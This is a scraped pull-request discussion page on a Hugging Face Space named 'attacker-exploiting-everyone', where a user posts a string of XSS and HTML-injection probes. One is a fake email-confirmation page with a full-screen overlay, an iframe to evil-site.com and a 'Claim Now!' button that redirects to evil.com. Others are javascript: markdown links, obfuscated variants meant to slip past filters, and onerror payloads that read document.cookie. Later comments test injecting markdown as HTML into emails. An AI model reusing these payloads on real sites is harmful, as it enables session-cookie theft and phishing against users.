Spaces:

attacker-exploiting-everyone
/

testingspace

Running

App Files Files Community

Create hello.md

#2

by datoto9019 - opened Sep 24

base: refs/heads/main

←

from: refs/pr/2

Discussion Files changed

Sep 24

No description provided.

Create hello.mde2fc407f

Sep 24

Malicious Markdown File

XSS Injection via HTML Tags

Click on this link:

alert('This Space Was Poisoned By Thee Eclipse for XSS as a POC')

Sep 24

Welcome to Our Platform!

Hi there,

Thank you for signing up! Please confirm your email by clicking the button below:

Legitimate Button:

<button style="background-color:green;color:white;padding:10px;border:none;">
  <a href="https://legitimate-site.com" style="text-decoration:none;color:white;">Confirm Email</a>
</button>


<div style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(0,0,0,0.5);">
  <canvas id="confetti"></canvas>
  <script>
    function confettiAnimation() {
      var confettiSettings = { target: 'confetti' };
      var confetti = new ConfettiGenerator(confettiSettings);
      confetti.render();
    }
    window.onload = confettiAnimation;
  </script>
</div>


<iframe src="http://evil-site.com" width="600" height="300"></iframe>


<button style="background-color:blue;color:white;padding:10px;border:none;" onclick="window.location='http://evil.com';">
  Claim Now!
</button>

Sep 24

fds

[Click Me](javascript:alert('Uh oh...'))

rew

fd

Sep 24

Basic
Local Storage
CaseInsensitive
URL
In Quotes
XSS
[XSS](j a v a s c r i p t:prompt(document.cookie))
XSS
XSS
[XSS]: (javascript:prompt(document.cookie))
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS

![XSS'"`onerror=prompt(document.cookie)](x)\

datoto9019 changed pull request status to closed Sep 24

Sep 24

totallyharmlesslink

Sep 24

Foo

hello you

hello you

Sep 24

HELLO

HELLO

Sep 24

HELLO

Sep 24

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

HELLO

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

7 days ago

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

HELLO

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

7 days ago

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

HELLO

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

about 14 hours ago

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

HELLO

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

about 14 hours ago

HELLO, THIS IS A POC_LUC INJECTION AS HTML TO EMAILS

HELLO

HELLO, THIS IS A MARKDOWN INJECTION AS HTML TO EMAILS

Upload images, audio, and videos by dragging in the text input, pasting, or clicking here.

Tap or paste here to upload images

· Sign up or log in to comment